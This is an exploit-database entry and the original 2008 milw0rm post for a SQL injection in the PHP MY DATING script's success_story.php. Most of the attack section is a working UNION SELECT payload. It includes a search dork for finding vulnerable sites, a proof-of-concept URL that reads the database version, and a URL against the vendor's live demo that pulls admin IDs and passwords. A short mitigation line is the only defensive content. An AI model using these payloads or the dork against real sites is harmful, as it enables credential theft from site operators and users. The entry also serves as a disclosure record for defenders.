header-logo
Suggest Exploit
vendor:
PHP MY DATING
by:
Hakxer
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP MY DATING
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP MY DATING

A SQL injection vulnerability exists in the success_story.php script of the PHP MY DATING application. An attacker can exploit this vulnerability to gain access to the database, including the version and database name, as well as the admin ID and password. This is done by sending a specially crafted HTTP request containing malicious SQL code to the vulnerable script.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

###############################################################################################
 _____    ____   __  ___    ______   ______       |   ____   _____     _____
|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|

# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sq1 inj3ct1on
# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil
# Team : EgY Coders 
#################################################################################################
####### [+] Bug in : success_story.php
## Dork : " Developed by Infoware Solutions "
### POC
      http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
	  
### Exploit iN L!ve Script 
#   [+] Get Version & Database Name [~]
#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
#   [+] Get ID&Pass [~] 
#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--

# [+] HaVe Fun .. ^_^ ;


###############################################################################

-------------------------------- The End of Gap -----------------------------------

## Contact : aq5@windowslive.com
### Muslim Hacker .. I love you Mohammed Rasull Allah 
######################################################

# milw0rm.com [2008-10-14]